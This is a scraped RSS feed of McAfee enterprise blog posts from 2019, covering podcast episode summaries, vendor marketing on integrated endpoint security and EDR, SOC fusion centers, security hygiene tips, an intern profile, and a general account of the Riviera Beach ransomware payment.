McAfee Enterprise – McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Mon, 07 Oct 2019 21:51:58 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png McAfee Enterprise – McAfee Blogs https://securingtomorrow.mcafee.com 32 32 ST11: MVISION Insights https://securingtomorrow.mcafee.com/other-blogs/podcast/st11-mvision-insights/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st11-mvision-insights/#respond Thu, 03 Oct 2019 19:41:46 +0000 https://securingtomorrow.mcafee.com/?p=97004

McAfee’s Senior Director of Security Intelligence Bill Woods and McAfee’s Director of Product Management Robert Leong discuss the importance of intelligence and insights.

The post ST11: MVISION Insights appeared first on McAfee Blogs.

]]>

McAfee’s Senior Director of Security Intelligence Bill Woods and McAfee’s Director of Product Management Robert Leong discuss the importance of intelligence and insights.

The post ST11: MVISION Insights appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st11-mvision-insights/feed/ 0
ST10: Unified Cloud Edge with Sadik AlAbdulla and Tom Bryant https://securingtomorrow.mcafee.com/other-blogs/podcast/st10-unified-cloud-edge-with-sadik-alabdulla-and-tom-bryant/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st10-unified-cloud-edge-with-sadik-alabdulla-and-tom-bryant/#respond Thu, 03 Oct 2019 16:11:43 +0000 https://securingtomorrow.mcafee.com/?p=96997

One of McAfee’s Vice Presidents of Product Management Sadik AlAbdulla and Global Technical Director of Web & DLP Tom Bryant are at MPOWER 2019 discussing the newly announced Unified Cloud Edge.

The post ST10: Unified Cloud Edge with Sadik AlAbdulla and Tom Bryant appeared first on McAfee Blogs.

]]>

One of McAfee’s Vice Presidents of Product Management Sadik AlAbdulla and Global Technical Director of Web & DLP Tom Bryant are at MPOWER 2019 discussing the newly announced Unified Cloud Edge.

The post ST10: Unified Cloud Edge with Sadik AlAbdulla and Tom Bryant appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st10-unified-cloud-edge-with-sadik-alabdulla-and-tom-bryant/feed/ 0
ST09: Strategic Intelligence vs. Tactical Threat Intelligence https://securingtomorrow.mcafee.com/other-blogs/podcast/st09-strategic-intelligence-vs-tactical-threat-intelligence/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st09-strategic-intelligence-vs-tactical-threat-intelligence/#respond Mon, 23 Sep 2019 17:05:25 +0000 https://securingtomorrow.mcafee.com/?p=96804

McAfee’s Director of Product Management Robert Leong and Security Operations Solutions Strategist Andrew Lancashire unpack the differences between strategic intelligence and tactical threat intelligence.  

The post ST09: Strategic Intelligence vs. Tactical Threat Intelligence appeared first on McAfee Blogs.

]]>

McAfee’s Director of Product Management Robert Leong and Security Operations Solutions Strategist Andrew Lancashire unpack the differences between strategic intelligence and tactical threat intelligence.

 

The post ST09: Strategic Intelligence vs. Tactical Threat Intelligence appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st09-strategic-intelligence-vs-tactical-threat-intelligence/feed/ 0
ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron https://securingtomorrow.mcafee.com/other-blogs/podcast/st08-uncovering-the-opportunity-of-edr-with-chris-young-ash-kulkarni-josh-zelonis-and-david-barron/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st08-uncovering-the-opportunity-of-edr-with-chris-young-ash-kulkarni-josh-zelonis-and-david-barron/#respond Fri, 06 Sep 2019 16:05:21 +0000 https://securingtomorrow.mcafee.com/?p=96619

In this exclusive episode featuring McAfee CEO Chris Young, we’re exploring EDR guided investigation and the opportunities it provides for reducing alert noise, maximizing the productivity of cybersecurity teams, and reducing triage and remediation times. Chris is joined by McAfee’s Chief Product Officer Ash Kulkarni, Forrester’s Principal Analyst Josh Zelonis, and GM Financial’s Assistant Vice […]

The post ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron appeared first on McAfee Blogs.

]]>

In this exclusive episode featuring McAfee CEO Chris Young, we’re exploring EDR guided investigation and the opportunities it provides for reducing alert noise, maximizing the productivity of cybersecurity teams, and reducing triage and remediation times. Chris is joined by McAfee’s Chief Product Officer Ash Kulkarni, Forrester’s Principal Analyst Josh Zelonis, and GM Financial’s Assistant Vice President of Cybersecurity David Barron, who each provide their unique perspectives on how guided investigation can address the security challenges and needs of today’s enterprises.

The post ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st08-uncovering-the-opportunity-of-edr-with-chris-young-ash-kulkarni-josh-zelonis-and-david-barron/feed/ 0
Easier Management with Integrated Endpoint Security https://securingtomorrow.mcafee.com/business/endpoint-security/easier-management-with-integrated-endpoint-security/ https://securingtomorrow.mcafee.com/business/endpoint-security/easier-management-with-integrated-endpoint-security/#respond Thu, 05 Sep 2019 15:42:36 +0000 https://securingtomorrow.mcafee.com/?p=96597

Integration matters. We at McAfee have been advocating the administrative benefits of integrated, centrally managed endpoint security for decades, but you don’t just have to take our word for it. A recent independently written article in BizTech Magazine concurs. BizTech explores technology and business issues that IT leaders and business managers face when they’re evaluating and […]

The post Easier Management with Integrated Endpoint Security appeared first on McAfee Blogs.

]]>

Integration matters. We at McAfee have been advocating the administrative benefits of integrated, centrally managed endpoint security for decades, but you don’t just have to take our word for it. A recent independently written article in BizTech Magazine concurs.

BizTech explores technology and business issues that IT leaders and business managers face when they’re evaluating and implementing solutions. In “Businesses Find Endpoint Security Easier to Manage with Integrated Solutions,” journalist Kym Gilhooly references a number of independent security surveys as well as interviews a CISO, an IT manager, and a network administrator at three different companies. Each of these cybersecurity professionals and their respective small and medium-sized companies came to the conclusion that, to defend against today’s breadth of threats—from signature-based to zero-day, known and unknown— an integrated security approach combining endpoint detection and response (EDR), next-generation antivirus, and application control makes more sense than deploying discrete solutions.

Uniting these technologies in one integrated solution has allowed them to take action across the threat defense lifecycle—from detecting and blocking threats and whitelisting critical applications to tracking down malicious exploits during or before execution and helping incident response teams respond and remediate faster. As CISO Tony Taylor of dairy company Land O’Lakes points out in the article, “There are lots of security tools out there, but if you don’t integrate the stack, you’ve got to associate all that information and make the connections yourself.”

EDR Becoming an Integral Component of Endpoint Security

All the companies interviewed by Gilhooly affirm the importance of EDR in their security defense. As an IT manager at a 500-employee retail company states in the article, “The days when IT took a set-it-and-forget-it approach to endpoint security are over.” The ability to quickly investigate threats—whether reactively seeking to understand where a threat originated, how it spread and what damage it caused, or proactively hunting for anomalous behavior and dormant threats—is becoming a must-have tool to shrink the response and remediation gap.

What’s more, the article recognizes that an integrated EDR-EPP (endpoint protection software) solution makes much more sense than bolting on an EDR point solution. That’s because EDR and EPP can enhance each other’s effectiveness. For instance, if a company uses McAfee Endpoint Security or SaaS-based McAfee MVISION Endpoint alongside McAfee MVISION EDR, when the EPP part of the integrated solution detects anomalous behavior on an endpoint—but not enough to convict it—an analyst can use EDR to enrich the data, subsequently raising or lowering the incident’s severity ranking. On the flip side, when the EDR part detects an unknown threat in the environment, the analyst can query the threat reputation database and share new threat information instantly across endpoints via the EPP.

The more cyberdefense tools can collaborate and be managed as a unified solution, the more actions can be automated, IT staff burdens reduced, and time freed up for more proactive forensics and other activities.

In short, the BizTech article reiterates what we’ve been saying: Integration is more than just a buzzword. It’s time to stop thinking about EDR as an add-on, or EPP and EDR as separate entities. It’s also time to start moving endpoint security to the cloud. The article touches on that, too.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

 

“There are lots of security tools out there, but if you don’t integrate the stack, you’ve got to associate all that information and make the connections yourself.”

— Land O’Lakes CISO Tony Taylor (as quoted in BizTech)

 

 

The post Easier Management with Integrated Endpoint Security appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/easier-management-with-integrated-endpoint-security/feed/ 0
ST07: Protecting IP in Healthcare with Andrew Lancashire and Sumit Sehgal https://securingtomorrow.mcafee.com/other-blogs/podcast/st07-protecting-ip-in-healthcare-with-andrew-lancashire-and-sumit-sehgal/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st07-protecting-ip-in-healthcare-with-andrew-lancashire-and-sumit-sehgal/#respond Mon, 19 Aug 2019 18:34:21 +0000 https://securingtomorrow.mcafee.com/?p=96447

For episode seven, we have returning guest, Andrew Lancashire, joined by Chief Healthcare Technical Strategist, Sumit Sehgal, where they discuss protecting intellectual property with an emphasis on the healthcare industry.

The post ST07: Protecting IP in Healthcare with Andrew Lancashire and Sumit Sehgal appeared first on McAfee Blogs.

]]>

For episode seven, we have returning guest, Andrew Lancashire, joined by Chief Healthcare Technical Strategist, Sumit Sehgal, where they discuss protecting intellectual property with an emphasis on the healthcare industry.

The post ST07: Protecting IP in Healthcare with Andrew Lancashire and Sumit Sehgal appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st07-protecting-ip-in-healthcare-with-andrew-lancashire-and-sumit-sehgal/feed/ 0
McAfee for McAfee: An Intern Journey https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-for-mcafee-an-intern-journey/ https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-for-mcafee-an-intern-journey/#respond Thu, 25 Jul 2019 15:42:33 +0000 https://securingtomorrow.mcafee.com/?p=96034

By Gwendolyn McAfee My grandfather always told me that I could achieve anything the world has to offer if I put my mind to it.  To me, that saying means that I am more powerful than anything else. I’ve always had a passion for technology, and somehow, everything I did, whether it was at school […]

The post McAfee for McAfee: An Intern Journey appeared first on McAfee Blogs.

]]>

By Gwendolyn McAfee

My grandfather always told me that I could achieve anything the world has to offer if I put my mind to it.  To me, that saying means that I am more powerful than anything else. I’ve always had a passion for technology, and somehow, everything I did, whether it was at school or in my personal life, technology was at the center of it.

So, when I started my junior year of college, I set a goal for myself to find a corporate internship in technology. Getting into an internship wasn’t as straightforward as I’d hoped. Determination and a little bit of good timing brought me to a career fair at my university, Prairie View A&M, where McAfee was in attendance. I spoke to the wonderful representatives and they encouraged me to apply for a position. I thought it was cliché. I mean, just because my surname is the same, does that mean I’m meant to work for McAfee? But then I said to myself, “The company is TOTALLY for you; it literally has your name (McAfee) on it. What other signs do you need?” So, I applied for a position, and eight months later, I found myself at McAfee as a Channel Operations Intern. Now, two months into my internship, McAfee has provided me with the real-world, hands-on projects and experience that I longed for in an internship.

Here are three reasons why my internship with McAfee has been a truly irreplaceable experience.

  1. “We innovate without fear.”

When I walked into McAfee on my first day, I felt the energy and strength of the people that make up McAfee. Everyone at McAfee innovates without fear. It is such an amazing sight to see McAfee employees so committed to creating and improving without fear of being judged or fear of failure. And instead of being told what to do, I got to share what my passions are and what I wanted to work on and, my what I hoped I could take away from my overall experience. My manager heard me and created a tailored plan for me. I create presentations, spreadsheets, and new strategies to help McAfee connect more with partners and customers. And I love the fact that I have the same expectations, responsibilities, and opportunities as any other team member. I truly feel like I get to add value to my team with every project that I complete. And that’s an exceptional feeling.

  1. Opportunities All Around

Through my internship at McAfee, I have gained a plethora of opportunities to attend different events and do things that I wouldn’t usually do. In my first few weeks in my internship, I collaborated with the university recruiters to create the first McAfee intern group community.  Through this, we were able help interns connect with others, and with McAfee executives. This helps every intern grow professionally, which goes back to McAfee’s mantra, “Together is Power.” The impact of connecting and working together is something that I cherish and firmly believe is one of the greatest things about working at McAfee.

 

 

 

 

  1. Overall Amazing

McAfee influences the world by providing top cybersecurity programs, giving back to the community, and being a top company to work for. McAfee has made an impact on my life, and my time here has shown me that I can truly make an impact on anything as long as I put my mind to it.

 

The post McAfee for McAfee: An Intern Journey appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-for-mcafee-an-intern-journey/feed/ 0
Cybersecurity Hygiene: 8 Steps Your Business Should be Taking https://securingtomorrow.mcafee.com/business/cybersecurity-hygiene-8-steps-your-business-should-be-taking/ https://securingtomorrow.mcafee.com/business/cybersecurity-hygiene-8-steps-your-business-should-be-taking/#respond Tue, 16 Jul 2019 15:00:50 +0000 https://securingtomorrow.mcafee.com/?p=95940

Whether you’re managing your enterprise’s cybersecurity or you’ve outsourced it to a service provider, you’re ultimately the one that will be held accountable for a data breach. If your vendor loses your data, your customers and board of directors will likely still hold you responsible. McAfee’s recent report, Grand Theft Data II: The Drivers and […]

The post Cybersecurity Hygiene: 8 Steps Your Business Should be Taking appeared first on McAfee Blogs.

]]>

Whether you’re managing your enterprise’s cybersecurity or you’ve outsourced it to a service provider, you’re ultimately the one that will be held accountable for a data breach. If your vendor loses your data, your customers and board of directors will likely still hold you responsible.

McAfee’s recent report, Grand Theft Data II: The Drivers and Shifting State of Data Breaches, reveals a majority of IT professionals have experienced at least one data breach, and on average have dealt with six breaches over the course of their career. Nearly three-quarters of all breaches have required public disclosure or have affected financial results.

Enterprise threats are increasing in number and sophistication, while rapidly targeting new vulnerabilities. And while, the top three vectors for exfiltrating data were database leaks, cloud applications, and removable USB drives, IT professionals are most worried about leaks from cloud enterprise applications such as Microsoft OneDrive, Cisco WebEx, and Salesforce.com.

Cybersecurity hygiene best practices must not only be established but updated and followed to keep up with these agile, versatile threats. Here are eight steps your business should be taking to implement better cybersecurity hygiene:

  1. Educate Your Teams All employees are part of an organization’s security posture. And yet, 61% of IT professionals say their executives expect more lenient security policies for themselves, and 65% of those respondents believe this leniency results in more incidents. Do as I say, not as I do can be dangerous. It’s imperative that you develop a continuing cybersecurity education program for all enterprise teams including best practices for passwords and how to detect phishing emails. Your program should include re-education processes for your IT team on breach targets such as default accounts and missing patches.
  2. Timely Patches and Updates – The Data Exfiltration Report found that IT was implicated in most data breaches, and much of this can be attributed to failures in cybersecurity hygiene, such as the failure to get a security patch out across the enterprise within 24 to 72 hours. Or failing to check that all available updates are accepted on every device. The vulnerabilities these patches and updates are designed to address can remain vulnerable for months despite the availability of the fixes. Cloud and SaaS operations have proven that automated patching testing and deployment works well with minimal downside risk.
  3. Implement Data Loss Policies (DLP) Data loss prevention requires thinking through the data, the applications, and the users. Most security teams continue to operate in isolation, with 81% reporting separate policies or management consoles for cloud access security brokers (CASBs) and data loss prevention (DLP). It is more important than ever to have a set of consistent Data Loss Prevention (DLP) policies that protect data everywhere it’s stored, including the cloud and corporate endpoints, networks, or unmanaged devices.
  4. Pay Attention to Cloud Security Settings – Cloud applications are where the bulk of your data resides, and data is what most cybercriminals are after. As Dev Ops moves more workloads to the cloud your enterprise needs to pay attention to the security setting of the cloud instances it uses and be aware of the security associated with the underlying infrastructure. Many security measures and considerations in the cloud are the same as on-prem, but some are different. Understanding the security of the cloud you choose and the applications that you use in the cloud are a critical part of securely navigating digital transformation.
  5. Technology Integration and Automation – One of the top actions cited for reducing future breach risks is integrating the various security technologies into a more cohesive defense. A lack of integration between security products allows suspicious activity to dwell unnoticed. If an attack is identified and blocked, all entry points should be instantly informed. If a compromised device is detected, security products should automatically scan all other devices for evidence of similar compromise, and quarantine affected systems. Automation allows machines to make these decisions based on policy set by the security team and accelerates time to detection and remediation without incurring material risk of unintended IT consequences.
  6. Deploy and Activate CASB, DLP, EDR – A Cloud Attack Security Broker (CASB) automatically classifies sensitive information, enforces security policies such as data loss prevention, rights management, data classification, threat protection, and encryption. Data Loss Prevention (DLP) safeguards intellectual property and ensures compliance by protecting sensitive data. Endpoint Detection and Response (EDR) can help your enterprise gain visibility into emerging threats with little maintenance and by monitoring endpoint activity, detecting suspicious behavior, making sense of high-value data, and understanding context. EDR can also reduce your need for additional SOC resources.
  7. Run Proper Device Audits –It’s important to regularly review device encryption on all devices including laptops, tablets, and mobile phones. Using multifactor identification strengthens your security beyond common sense steps like evaluating and promoting password strength.
  8. Have an Incident Response Plan – You may have only minutes and hours to act on a cyberattack. Good intentions aren’t enough to effectively respond and remedy a security breach. Be prepared before it happens. An Incident Response Plan is integral in helping your enterprise respond more effectively, reduce business disruptions and a loss of reputation.

For more on how to improve your enterprise’s cybersecurity hygiene using automation, integration, and cloud-based deployment and analytics, check out McAfee MVISION EDR.

The post Cybersecurity Hygiene: 8 Steps Your Business Should be Taking appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/cybersecurity-hygiene-8-steps-your-business-should-be-taking/feed/ 0
ST06: Building Resilience with Cyber Threat Intelligence with Mo Cashman, Martin Ohl, and Leon Ward https://securingtomorrow.mcafee.com/other-blogs/podcast/st06-building-resilience-with-cyber-threat-intelligence-with-mo-cashman-martin-ohl-and-leon-ward/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st06-building-resilience-with-cyber-threat-intelligence-with-mo-cashman-martin-ohl-and-leon-ward/#respond Thu, 11 Jul 2019 17:00:52 +0000 https://securingtomorrow.mcafee.com/?p=95913

McAfee’s Director of Solution Architects and Principal Engineer, Mo Cashman and Solution Architect, Martin Ohl team up with ThreatQuotient’s VP of Product Management, Leon Ward to discuss the lies and myths of threat intelligence.

The post ST06: Building Resilience with Cyber Threat Intelligence with Mo Cashman, Martin Ohl, and Leon Ward appeared first on McAfee Blogs.

]]>

McAfee’s Director of Solution Architects and Principal Engineer, Mo Cashman and Solution Architect, Martin Ohl team up with ThreatQuotient’s VP of Product Management, Leon Ward to discuss the lies and myths of threat intelligence.

The post ST06: Building Resilience with Cyber Threat Intelligence with Mo Cashman, Martin Ohl, and Leon Ward appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st06-building-resilience-with-cyber-threat-intelligence-with-mo-cashman-martin-ohl-and-leon-ward/feed/ 0
The Ever-Evolving SOC https://securingtomorrow.mcafee.com/business/security-operations/the-ever-evolving-soc/ https://securingtomorrow.mcafee.com/business/security-operations/the-ever-evolving-soc/#respond Mon, 08 Jul 2019 15:00:32 +0000 https://securingtomorrow.mcafee.com/?p=95776

In the 17th century, poet John Donne wrote, “no man is an island entire of itself.” He also mentioned every man is “a part of the main.” Fast forward to the 21st century and you’ll find this concept still rings true, especially as it relates to security. Like everything else in the world, the security […]

The post The Ever-Evolving SOC appeared first on McAfee Blogs.

]]>

In the 17th century, poet John Donne wrote, “no man is an island entire of itself.” He also mentioned every man is “a part of the main.” Fast forward to the 21st century and you’ll find this concept still rings true, especially as it relates to security.

Like everything else in the world, the security industry is constantly evolving. More sophisticated, targeted threats are emerging at an exponential rate and organizations need high-caliber solutions – and strategy – to keep up. However, when organizations act independently, they put themselves at risk by not incorporating the lessons learned from others or they experience roadblocks that delay resolution when they do not have access to full context or information. Keeping true to Donne’s word, every organization must realize they are in the same fight together, which is why we’ve seen the rise of fusion centers across the globe.

New Problems, New SOCs

Taking Security Operations Centers (SOCs) to the next level, fusion centers are designed to knowledge share. They connect all parts of an organization, with the end goal to increase transparency and visibility to rapidly uncover posed threats either before they happen, or quickly stop them in their tracks. Additionally, fusion centers have a key benefit: they help to advance the cybersecurity industry by identifying new cybersecurity product and solution needs to maintain a steady pace against the evolution of threats.

Operating at a global scale, fusion centers have proven to be an avenue to rapidly process and centralize seemingly unrelated and dispersed information. Using analytics to identify patterns and behaviors from a tremendous amount of data across multiple endpoints facilitates increased threat detection and correction – allowing for real-time remediation.

Advice for Enterprises

Access to intelligence and better, more coordinated strategies are imperative for enterprises to succeed in 2019 and beyond. To break it down, the intent of threat actors is to “beat” existing security measures in place, however it is harder for them to succeed attacking multiple pieces of technology. Fusion centers provide the self-actualization the industry needs, including using artificial intelligence and feedback mechanisms to present a more well-rounded approach to stop attackers.

For example, if an organization has one attack with an existing pattern, without the information fusion centers can provide, data breaches experience greater time to detect. The threats from this additional time spent can have dire consequences. A longer detection and response time can equate to damage to an organization’s reputation as well as financial impact through loss of revenue. Organizations should be striving to find a way to reciprocally share intelligence – it is absolutely a two-way street. The more structure behind identifying multiple data elements correlated with threat actors’ patterns, the greater chance threats will quicker to find and fix.

We’ve seen some additional benefits and lessons learned from fusion centers, including:

  • Focus on people and process – Technology is only part of the solution. For now, humans need to work alongside machines and technology in order to thrive. The conversation has moved from a single individual asking, “How do I use this tool to the best of my capability,” to an all-in mentality that is focused on the broader organization to improve overall processes and approach.
  • Consolidation is key – The disparity of data and information introduces room for error. Having a different point product on every endpoint creates complexity and introduces risks. Simplification of an organization’s security environment, including combination and coordination between tool sets, is beneficial. Organizations should strategically choose which vendors they would like to work with and evaluate how solutions can work together to provide ultimate optimization.
  • Great foundation, better security hygiene – A major lesson some organizations learn the hard way is that in hindsight, they should have exercised better practices to drive maturity within their SOC. Having a strong control of assets and information and knowing where data lies at any given time is extremely critical. Without this, organizations risk the chance of being blindsided when they go to investigate a case and find an asset on their network they were unaware of.
  • Strengthen existing processes – Make sure your organization’s authentication is secured so you are aware of user behavior occurring across everything. Additionally, organizations need to examine their patching cycles and vulnerabilities management programs to identify any flaws that can be addressed. This allows for the maturity of their SOC – and furthermore – provides another opportunity to stay ahead of the curve.

It takes a village

Knowing the talent gap the cybersecurity industry still faces, CISOs need to be prominent leaders in their organization to shape the future of how the SOC evolves and how fusion centers can be leveraged to thwart or quickly remedy attacks. The challenges will only get more complex, so investing in continual education, mentoring of existing and new employees and staying abreast of trends and new technologies will be crucial.

The post The Ever-Evolving SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/the-ever-evolving-soc/feed/ 0
The $1.5 Million Email https://securingtomorrow.mcafee.com/business/the-1-5-million-email/ https://securingtomorrow.mcafee.com/business/the-1-5-million-email/#respond Tue, 25 Jun 2019 20:05:37 +0000 https://securingtomorrow.mcafee.com/?p=95713

Ransomware has been around since the late 1980s, but in recent years, it has emerged as one of the largest financial threats facing the public and private sector alike. According to the U.S. Department of Homeland Security, ransomware is the fastest-growing malware threat—and according to a report by Recorded Future in May, more than 170 […]

The post The $1.5 Million Email appeared first on McAfee Blogs.

]]>

Ransomware has been around since the late 1980s, but in recent years, it has emerged as one of the largest financial threats facing the public and private sector alike. According to the U.S. Department of Homeland Security, ransomware is the fastest-growing malware threat—and according to a report by Recorded Future in May, more than 170 state and local governments have been the victims of ransomware attacks since 2013.

In addition to improved ransomware capabilities, such as military-grade encryption algorithms, two key factors have emboldened cybercriminals to launch such attacks: the rise of hard-to-trace cryptocurrency such as Bitcoin, and the tendency of unprepared targets to continue meeting scammers’ demands, even as these demands become increasingly audacious.

One such target was the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach, which recently paid a near-record 65 Bitcoins to a gang of hackers after a ransomware attack brought the city to a halt.

On May 29, a city employee opened an email containing a piece of malware, which quickly infected nearly every city computer network. With the municipal computer system held hostage, all operations were hobbled—everything from the city’s website, email server and VoIP phones to the water utility pump stations. 911 dispatchers were forced to take down caller information on paper, employees and vendors had to be paid with paper checks, utility payments could only be accepted by snail mail or in person, and police officers had to resort to digging through closets at headquarters to find paper traffic citation pads.

City leaders were told they could make all of these problems go away—if they simply complied with the ransomers’ demand to remit 65 bitcoin (roughly $600,000) in exchange for the decryption key.

While the city had originally decided not to pay the ransom—opting instead to invest $914,000 into purchasing hundreds of new desktop and laptop computers and other hardware in an attempt to circumvent the issue—these measures ultimately failed. Three weeks after the original attack, based on the advice of an outside security consulting firm, the city council met to discuss next steps—and unanimously decided, after just two minutes of discussion, to acquiesce. The total cost, including the unbudgeted-for hardware, the consultation, and of course, the ransom itself, amounted to more than $1.5 million. For a city of just 35,000 residents, the cost was staggering, even after insurance paid its percentage.

While Riviera Beach was among the latest targets, it certainly won’t be the last, or the largest—according to a 2018 Deloitte-NASCIO survey, nearly half of states lack a separate cybersecurity budget, and a majority allocate under 3% of IT budgets to cyberthreat prevention.

But with ransomware attacks continuing to unleash a post-internet world on any unsuspecting target at any time, many targets are finding that, as much as they thought they lacked the resources to prevent such attacks, they’re even less prepared for the aftermath. Once infected, they’re left with two unsavory options: Pay the ransom, knowing that there’s no guarantee the hackers will decrypt the systems or that they’ll be decrypted perfectly. And even if they are, there are still the moral implications: When governments pay such ransoms, they’re not only putting taxpayer dollars directly into the hands of criminals, they’re also encouraging future ransomware attacks. The alternative, of course, is to try to rebuild…often from the ground up.

While cyberinsurance policies can give the illusion of protection, this solution will likely become less viable as the frequency of attacks continues to rise and the amount demanded continues to skyrocket. The goal, then, becomes for companies, government entities and individuals to prepare for and prevent these attacks before they’re targeted. While large-scale legislative solutions, such as outlawing the payment of ransomware demands, may eventually offer some relief, here are some steps that companies, individuals and government entities can take right now to prevent being victims:

  1. Learn: Resources such as NoMoreRansom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.
  2. Educate: When it comes to ransomware, knowing isn’t half the battle—it’s the entire battle. When millions of dollars hinge on your employees’ decision whether or not to open an email, organization-wide training on how to spot malicious emails and social engineering schemes may pay for itself many, many times over.
  3. Backup: There’s no reason to pay criminals to decrypt your data if you have access to a copy. Frequently back up essential data, ideally storing it both locally and on the cloud.
  4. Update: Always downloading the newest version of your operating system or apps helps you stay ahead of threats
  5. Defend: Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected.

The post The $1.5 Million Email appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/the-1-5-million-email/feed/ 0
ST05: Protecting Intellectual Property with Andrew Lancashire and Kate Scarcella https://securingtomorrow.mcafee.com/other-blogs/podcast/st05-protecting-intellectual-property-with-andrew-lancashire-and-kate-scarcella/ https://securingtomorrow.mcafee.com/other-blogs/podcast/st05-protecting-intellectual-property-with-andrew-lancashire-and-kate-scarcella/#respond Fri, 14 Jun 2019 16:07:38 +0000 https://securingtomorrow.mcafee.com/?p=95605

In this episode, security operations solutions strategist Andrew Lancashire and Kate Scarcella discuss the important of protecting your intellectual property in the workplace.

The post ST05: Protecting Intellectual Property with Andrew Lancashire and Kate Scarcella appeared first on McAfee Blogs.

]]>

In this episode, security operations solutions strategist Andrew Lancashire and Kate Scarcella discuss the important of protecting your intellectual property in the workplace.

The post ST05: Protecting Intellectual Property with Andrew Lancashire and Kate Scarcella appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/podcast/st05-protecting-intellectual-property-with-andrew-lancashire-and-kate-scarcella/feed/ 0
How to Get the Best Layered and Integrated Endpoint Protection https://securingtomorrow.mcafee.com/business/endpoint-security/how-to-get-the-best-layered-and-integrated-endpoint-protection/ https://securingtomorrow.mcafee.com/business/endpoint-security/how-to-get-the-best-layered-and-integrated-endpoint-protection/#respond Mon, 20 May 2019 17:00:46 +0000 https://securingtomorrow.mcafee.com/?p=95281

Security teams have historically been challenged by the choice of separate next-gen endpoint security technologies or a more integrated solution with a unified management console that can automate key capabilities. At this point it’s not really a choice at all – the threat landscape requires you to have both. The best layered and integrated defenses […]

The post How to Get the Best Layered and Integrated Endpoint Protection appeared first on McAfee Blogs.

]]>

Security teams have historically been challenged by the choice of separate next-gen endpoint security technologies or a more integrated solution with a unified management console that can automate key capabilities. At this point it’s not really a choice at all – the threat landscape requires you to have both. The best layered and integrated defenses now include a broad portfolio of advanced prevention technologies, endpoint security controls, and advanced detection/response tools – all within an integrated system that goes beyond alerts and into insights that even a junior analyst can act on.

More Endpoints = More Vulnerabilities

Endpoints are long beyond on-premises servers, PCs, and traditional operating systems. Internet of things devices such as printers, scanners, point-of-sale handhelds, and even wearables are vulnerable and can provide entry points for organized attacks seeking access to corporate networks. Mobile devices—both BYOD and corporate issued—are among the easiest targets for app-based attacks. Per the 2019 McAfee Mobile Threat Report, the number one threat category was hidden apps, which accounted for almost one-third of all mobile attacks.

Many enterprises are unaware of their target-rich endpoint environments, resulting in security teams struggling to maintain complete vigilance. A 2018 SANS Survey on Endpoint Protection and Response revealed some sobering statistics:

  • 42% of respondents report having had their endpoints exploited
  • 84% of endpoint breaches include more than one endpoint
  • 20% didn’t know whether they’d been breached

Endpoint attacks are designed to exploit the hapless user, including web drive-by, social engineering/phishing, and ransomware. Because these attacks rely on human actions, there’s a need for increased monitoring and containment, along with user education.

The latest attacks have the ability to move laterally across your entire environment, challenging every endpoint until a vulnerability is found. Once inside your walls, all endpoints become vulnerable. Modern endpoint security must extend protection across the entire digital terrain with visibility to spot all potential risks.

Less Consoles = Better Efficiency

A 2018 MSA Research report on security management commissioned by McAfee revealed that 55% of organizations struggle to rationalize data when three or more consoles are present. Too many security products, devices, and separate consoles call for a large budget and additional employees who might struggle to maintain a secure environment.

In contrast, single management consoles can efficiently coordinate the defenses built into modern devices while extending their overall posture with advanced capabilities—leaving nothing exposed. With everchanging industry requirements, an integrated endpoint security approach ensures that basic standards and processes are included and up to date.

Why McAfee Endpoint Security

McAfee offers a broad portfolio of security solutions that combine established capabilities (firewall, reputation, and heuristics) with cutting-edge machine learning and containment, along with endpoint detection and response (EDR) into a single-agent all-inclusive management console.

Is it time you took a fresh look at your strategy? Learn more in this white paper: Five ways to rethink your endpoint protection strategy.

The post How to Get the Best Layered and Integrated Endpoint Protection appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/how-to-get-the-best-layered-and-integrated-endpoint-protection/feed/ 0
Cloud 101: Navigating the Top 5 Cloud Management Challenges https://securingtomorrow.mcafee.com/business/cloud-security/cloud-101-navigating-the-top-5-cloud-management-challenges/ https://securingtomorrow.mcafee.com/business/cloud-security/cloud-101-navigating-the-top-5-cloud-management-challenges/#respond Wed, 15 May 2019 15:00:13 +0000 https://securingtomorrow.mcafee.com/?p=95174

Cloud management is a critical topic that organizations are looking at to simplify operations, increase IT efficiency, and reduce costs. Although cloud adoption has risen in the past few years, some organizations aren’t seeing the results they’d envisioned. That’s why we’re sharing a few of the top cloud management challenges enterprises need to be cautious […]

